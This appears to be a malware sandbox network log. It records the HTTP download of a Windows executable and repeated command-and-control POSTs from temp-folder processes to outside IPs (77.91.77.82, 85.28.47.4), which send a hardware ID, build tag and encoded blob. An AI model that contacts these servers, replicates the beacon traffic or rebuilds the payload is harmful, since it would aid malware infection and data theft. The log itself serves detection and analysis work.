Jul 3, 2024 18:09:05.482038021 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:05 GMT Content-Type: application/octet-stream Content-Length: 2545664 Last-Modified: Wed, 03 Jul 2024 15:01:11 GMT Connection: keep-alive ETag: "668567b7-26d800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 84 8e bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 bf 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELAf!@@ 0z>0@@@0!@@Pp# @@y#(@.data""4@
Jul 3, 2024 18:09:05.482079983 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 82 d7 66 a0 b2 c0 d7 f1 1a 53 c4 76 eb 70 1d cb 2a 39 2b 78 fa eb d7 2a 4c Data Ascii: fSvp9+xLvIL;\|dZZ1WU#!<?Gc&VRJ@{(3]z*er@h?AMlT3][)J7_AdjI\LdL}oC>k=R/x7&h
Jul 3, 2024 18:09:05.482095957 CEST	1236	IN	Data Raw: 2f a7 6f 52 fe 71 90 f0 a8 05 f7 01 9e 94 e3 3e cf 7c 16 29 88 c7 72 70 08 fa 2f a9 ba 74 77 7e bf 5c 20 4a 8b 09 12 79 84 91 ea 7c 90 9c 28 21 d9 5a 02 8b 6d 0b dd ff 63 48 0a 70 10 12 77 6e 34 a6 b9 8a 43 21 53 5c 23 de 0a 4c 75 20 c7 37 26 ee Data Ascii: /oRq>\|)rp/tw~\ Jy\|(!ZmcHpwn4C!S\#Lu 7&l=EalLFu:]<&+agsn@d#mN=Y<-`V%Md[qTx#W(KvA4l&;/t>*t9>dixITTMli%~%6
Jul 3, 2024 18:09:05.482176065 CEST	1236	IN	Data Raw: 2b ba fe ce f9 2b d0 56 03 93 8c 2a fe 1b 06 24 e7 d4 b8 88 0c a6 e0 4a d6 48 4c 2b 5d 8a b5 d7 d9 a5 57 8a 34 d4 c6 e4 cf 58 25 45 ef e7 90 b3 81 c8 2a 90 68 14 45 07 6d 1f 16 c0 9a db a5 6c ee 09 e0 6d fc 43 65 24 81 24 15 cc d1 e4 0a 5f b5 46 Data Ascii: ++V$JHL+]W4X%EhEmlmCe$$_FxOt{^x!K9{/&u/zJ0h5F~aH&'V#_c!Z4Zc^@M}^p.L>6BEvfa+\|K?"-~
Jul 3, 2024 18:09:05.482193947 CEST	1236	IN	Data Raw: 95 32 ff 5d 9f a5 aa df a5 b6 12 ff 75 70 1f 4d 0b ad 75 65 33 32 72 71 c7 fb 4e da 48 8f ff 23 f0 b5 97 73 c5 dc 0c 3e fe 99 4f 24 ee 83 18 0e 71 9b 91 47 21 5b d0 55 72 d7 0b a0 36 46 c2 26 ad 8c 58 3b f6 5e a9 55 07 b1 8c 92 a0 60 f1 12 f1 cf Data Ascii: 2]upMue32rqNH#s>O$qG![Ur6F&X;^U`=,td0+<umOv<aRU_IHH$j"UbPem,)W`n.jH*C<ebr(i!iaXxKkLTJZ0)3
Jul 3, 2024 18:09:05.482209921 CEST	1236	IN	Data Raw: 50 5f 70 d9 e0 92 1d 2c d3 dd 48 17 73 70 58 de 79 7a 09 31 71 d4 7d 9d b5 52 a4 ab 8a 16 46 41 3d 70 55 0f 15 a5 a9 e1 55 ae 48 47 77 ca 19 99 1c de 28 76 40 aa df 33 e3 5c 70 f3 93 b4 f2 e8 58 8b 71 57 cf 5d 83 af c2 85 77 60 b1 5f bf ca 5c 04 Data Ascii: P_p,HspXyz1q}RFA=pUUHGw(v@3\pXqW]w`_\Y+[P\SL+sAv!A-Sk1i?dcSieW~^3p8e#]-'+_8;6w0.}%q$r{$@Q&wz`55
Jul 3, 2024 18:09:05.482228994 CEST	1236	IN	Data Raw: b7 c0 af 5d b7 68 a5 4d 0e 14 2a 48 86 eb 79 44 82 89 e1 6e 78 4a fd ec ad c7 d9 f2 37 fd c9 8f 4f aa 61 9c 30 b4 3c d2 e4 04 f9 39 96 98 c0 bb 2b 53 03 d3 4d b2 9a 6c 4c c3 1e 07 34 42 28 12 3b b3 b9 aa 92 52 59 22 90 6e 76 35 c8 39 08 70 90 48 Data Ascii: ]hM*HyDnxJ7Oa0<9+SMlL4B(;RY"nv59pHHjBo-u:8,DDo25j:igaR#7`$XV7"k#2w"GM.\r?`kCxN'@F7Et2q
Jul 3, 2024 18:09:05.482368946 CEST	1236	IN	Data Raw: 1f 05 3d d2 43 2c 63 a7 43 32 7a be de 53 2f 85 93 e6 07 c4 52 4c 1d 17 11 f2 a0 74 cc 93 2a 54 06 c2 e9 66 f3 8c 84 66 29 cf 06 f7 44 7e b8 0e fb 28 1d 4c 33 9f da 51 7c 0f 43 18 92 c0 f8 c2 d6 36 41 66 93 f1 bc a8 88 76 8d b8 ec 34 4d 6e 3b 7d Data Ascii: =C,cC2zS/RLtTff)D~(L3Q\|C6Afv4Mn;};#{Sm,bF<ZelZF?_>~H [)e6hl\MLc::5_\H&2:Q*8vV?ZR04v>twVI\V6:co4
Jul 3, 2024 18:09:05.482386112 CEST	1236	IN	Data Raw: 3c 3e 28 65 3e 71 96 54 54 e5 0d c6 3f 21 89 8a ab 4e 42 78 77 1f b4 9f cc b9 cb d7 10 bf 26 c9 64 21 be e1 96 21 47 de 06 64 ad d7 30 c6 90 4d a0 04 40 36 81 34 1d 64 09 67 02 2b 9b f5 be 90 9a 59 4a 8d 42 de ff 4f a8 35 36 d7 2d 89 1c 8f c6 1c Data Ascii: <>(e>qTT?!NBxw&d!!Gd0M@64dg+YJBO56-MoU+6ABJPJ?,"JVMaf;7w=KcD\!~L"m,jZ&3s(D(T"eOSEM-aP3H=\mc
Jul 3, 2024 18:09:05.482415915 CEST	1236	IN	Data Raw: a4 1f 9c 9e 60 36 6e 58 2a 5d b9 d6 89 c5 48 89 ed 91 fb c7 aa 50 91 f9 a6 b1 4d 91 32 53 a6 bd 91 a7 dd 5a 71 d2 5d 10 49 04 d7 b1 31 4e ca 37 7c a5 65 a4 0c 5d 5c ef d4 70 65 5b 85 0f d6 60 4f 30 d6 e7 fc aa b7 50 15 08 b0 6c 30 be 10 39 03 c5 Data Ascii: `6nX]HPM2SZq]I1N7\|e]\pe[`O0Pl09#iNV^/'t'}wy>D cATv=kRcT~7+4V~k+s"`>6ly{rYOSCfM5y_W%0
Jul 3, 2024 18:09:05.487097979 CEST	1236	IN	Data Raw: 72 ac af 26 d7 2c 6f e6 38 c2 06 1c 39 8b b5 fe be 20 1c 41 d4 62 af ea a5 ba eb e7 d4 90 2c b0 1b c9 8c 13 60 e3 b2 be 99 a1 66 ec e8 f7 23 25 7e d6 ab 4e 98 ad e9 84 f0 c5 13 90 40 24 56 e4 b3 f5 f7 cd ed 36 69 d0 17 4e 4e 20 7d e1 61 20 84 cd Data Ascii: r&,o89 Ab,`f#%~N@$V6iNN }a #%FMfI\|W.E@BH07)K/VW#N'J!d 5?2-*<BUICrs462S%`mM}!q_d@>;>_4bjmw3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	62924	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:08.323767900 CEST	179	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Jul 3, 2024 18:09:09.019506931 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	62925	85.28.47.4	80	6984	C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:08.328325033 CEST	408	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC Host: 85.28.47.4 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"jony------KJKJJEGIDBGIDGCBAFHC--
Jul 3, 2024 18:09:08.940884113 CEST	211	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:09:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	62926	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:09.141840935 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:09.857094049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:09.857814074 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:10.093225956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	62927	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:10.205610037 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:10.908123970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:10.908958912 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:11.130245924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	62928	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:11.251581907 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:11.959661961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:11.960980892 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:12.174721956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	62929	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:12.282835960 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:12.994389057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:12.995392084 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:13.216878891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	62930	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:13.331808090 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:14.023633957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:14.024416924 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:14.242964983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	62931	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:14.362386942 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:15.056071043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:15.056849003 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:15.278609037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	62932	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:15.393549919 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:16.075664043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:16.076412916 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:16.289328098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	62933	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:16.407810926 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:17.675995111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
